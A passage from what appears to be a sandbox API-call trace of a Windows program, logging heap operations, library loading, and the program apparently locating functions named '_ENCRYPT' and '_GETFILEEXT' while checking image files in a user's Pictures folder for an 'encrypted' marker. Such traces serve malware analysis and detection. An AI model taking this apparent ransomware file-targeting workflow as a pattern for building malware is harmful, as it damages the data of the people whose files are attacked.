lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.015] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.016] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.017] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.018] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.018] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0041.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889af0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.019] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.019] CloseHandle (hObject=0x128) returned 1 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.019] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.020] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.020] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.020] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.020] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.020] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.021] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x9c732570, ftLastWriteTime.dwHighDateTime=0x1d5b9ec, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0x7c20c0 [0041.021] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x9c732570, ftLastWriteTime.dwHighDateTime=0x1d5b9ec, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0x7c20c0 [0041.021] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, 